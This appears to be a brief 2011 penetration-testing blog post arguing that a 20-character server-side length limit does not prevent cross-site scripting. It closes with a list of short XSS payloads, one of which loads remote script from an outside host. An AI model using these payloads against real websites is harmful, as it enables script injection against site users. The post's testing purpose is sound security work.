Archive for July, 2011

While performing penetration testing, there was a text field which was not accepting more than 20 characters(server side validation). I inserted following piece of code to check XSS (From RSnake’s XSS cheat sheet):


and verified the source for <XSS verses &lt;XSS . As<XSS  was in the source,  the field in the context was vulnerable to cross site scripting.

Then I tried hard to create/find some script which should be less than or equal to 20 characters and could be executed on this field to confirm the XSS but I was not able to find anything. At that time a thought came into my mind that could we consider max-length validation also a mitigation for XSS and see the irony that as soon as I asked this question IT Security stack-exchange forum, I found the scripts which can be used to verify XSS on a field which has max-length server side validation and those scripts have been provided below.

So max-length validation cannot mitigate XSS attacks.

<a href=http://a.by> <a onclick=alert(2)> <b onclick=alert(2)> <script src=//h4k.me

Read Full Post »